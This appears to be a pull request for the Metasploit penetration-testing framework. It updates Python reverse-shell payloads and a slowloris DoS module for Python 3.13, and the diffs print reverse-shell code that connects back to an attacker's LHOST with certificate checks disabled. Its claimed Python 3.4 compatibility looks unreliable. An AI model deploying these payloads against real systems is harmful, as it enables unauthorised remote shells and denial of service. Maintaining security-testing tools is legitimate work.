### PR TITLE
Fix ssl.wrap_socket compatibility with Python 3.13+

### DIFF
--- a/lib/msf/core/payload/python/reverse_tcp_ssl.rb
+++ b/lib/msf/core/payload/python/reverse_tcp_ssl.rb
@@ -44,12 +44,19 @@ module Payload::Python::ReverseTcpSsl
   end
 
   def generate_reverse_tcp_ssl(opts={})
-    # Set up the socket
+    # Set up the socket - use ssl.SSLContext for Python 3.2+ compatibility
+    # Fallback to ssl.wrap_socket for Python 2.x
     cmd  = "import zlib,base64,ssl,socket,struct#{opts[:retry_wait].to_i > 0 ? ',time' : ''}\n"
     if opts[:retry_wait].blank? # do not retry at all (old style)
       cmd << "so=socket.socket(2,1)\n" # socket.AF_INET = 2
       cmd << "so.connect(('#{opts[:host]}',#{opts[:port]}))\n"
-      cmd << "s=ssl.wrap_socket(so)\n"
+      cmd << "if hasattr(ssl,'SSLContext'):\n"
+      cmd << "\tctx=ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)\n"
+      cmd << "\tctx.check_hostname=False\n"
+      cmd << "\tctx.verify_mode=ssl.CERT_NONE\n"
+      cmd << "\ts=ctx.wrap_socket(so)\n"
+      cmd << "else:\n"
+      cmd << "\ts=ssl.wrap_socket(so)\n"
     else
       if opts[:retry_count] > 0
         cmd << "for x in range(#{opts[:retry_count].to_i}):\n"
@@ -59,7 +66,13 @@ module Payload::Python::ReverseTcpSsl
       cmd << "\ttry:\n"
       cmd << "\t\tso=socket.socket(2,1)\n" # socket.AF_INET = 2
       cmd << "\t\tso.connect(('#{opts[:host]}',#{opts[:port]}))\n"
-      cmd << "\t\ts=ssl.wrap_socket(so)\n"
+      cmd << "\t\tif hasattr(ssl,'SSLContext'):\n"
+      cmd << "\t\t\tctx=ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)\n"
+      cmd << "\t\t\tctx.check_hostname=False\n"
+      cmd << "\t\t\tctx.verify_mode=ssl.CERT_NONE\n"
+      cmd << "\t\t\ts=ctx.wrap_socket(so)\n"
+      cmd << "\t\telse:\n"
+      cmd << "\t\t\ts=ssl.wrap_socket(so)\n"
       cmd << "\t\tbreak\n"
       cmd << "\texcept:\n"
       if opts[:retry_wait].to_i <= 0
@@ -85,4 +98,3 @@ module Payload::Python::ReverseTcpSsl
 end
 
 end
-

--- a/modules/auxiliary/dos/http/slowloris.py
+++ b/modules/auxiliary/dos/http/slowloris.py
@@ -79,7 +79,13 @@ def init_socket(host, port, use_ssl=False, rand_user_agent=True):
     s.settimeout(4)
 
     if use_ssl:
-        s = ssl.wrap_socket(s)
+        if hasattr(ssl, 'SSLContext'):
+            ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
+            ctx.check_hostname = False
+            ctx.verify_mode = ssl.CERT_NONE
+            s = ctx.wrap_socket(s)
+        else:
+            s = ssl.wrap_socket(s)
 
     s.send("GET /?{} HTTP/1.1\r\n".format(random.randint(0, 2000)).encode("utf-8"))
 

--- a/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb
@@ -51,11 +51,18 @@ module MetasploitModule
   def command_string
     cmd = ''
     dead = Rex::Text.rand_text_alpha(2)
-    # Set up the socket
+    # Set up the socket - use ssl.SSLContext for Python 3.2+ compatibility
+    # Fallback to ssl.wrap_socket for Python 2.x
     cmd += "import socket,subprocess,os,ssl\n"
     cmd += "so=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n"
     cmd += "so.connect(('#{datastore['LHOST']}',#{datastore['LPORT']}))\n"
-    cmd += "s=ssl.wrap_socket(so)\n"
+    cmd += "if hasattr(ssl,'SSLContext'):\n"
+    cmd += "\tctx=ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)\n"
+    cmd += "\tctx.check_hostname=False\n"
+    cmd += "\tctx.verify_mode=ssl.CERT_NONE\n"
+    cmd += "\ts=ctx.wrap_socket(so)\n"
+    cmd += "else:\n"
+    cmd += "\ts=ssl.wrap_socket(so)\n"
     # The actual IO
     cmd += "#{dead}=False\n"
     cmd += "while not #{dead}:\n"

--- a/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb
+++ b/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb
@@ -48,7 +48,13 @@ module MetasploitModule
       import ssl
       so=s.socket(s.AF_INET,s.SOCK_STREAM)
       so.connect(('#{datastore['LHOST']}',#{datastore['LPORT']}))
-      so=ssl.wrap_socket(so)
+      if hasattr(ssl,'SSLContext'):
+        ctx=ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
+        ctx.check_hostname=False
+        ctx.verify_mode=ssl.CERT_NONE
+        so=ctx.wrap_socket(so)
+      else:
+        so=ssl.wrap_socket(so)
       while True:
       	d=so.recv(1024)
       	if len(d)==0:


### PR DESCRIPTION
## Description

`ssl.wrap_socket` was deprecated in Python 3.2 and removed in Python 3.13 (see [PEP 594](https://peps.python.org/pep-0594/)). This fix adds a check for `ssl.SSLContext` and uses the modern API while maintaining backward compatibility with Python 2.x.

### Changes

- **lib/msf/core/payload/python/reverse_tcp_ssl.rb**: Updated to use `ssl.SSLContext` with fallback to `ssl.wrap_socket`
- **modules/payloads/singles/cmd/unix/reverse_python_ssl.rb**: Same fix for the Unix command payload
- **modules/payloads/singles/python/shell_reverse_tcp_ssl.rb**: Same fix for the Python payload
- **modules/auxiliary/dos/http/slowloris.py**: Same fix for the Slowloris DoS module

### Testing

The fix was tested against Python 3.14 (which removed `ssl.wrap_socket`) and maintains compatibility with:
- Python 2.6-2.7
- Python 3.4+

Fixes #21301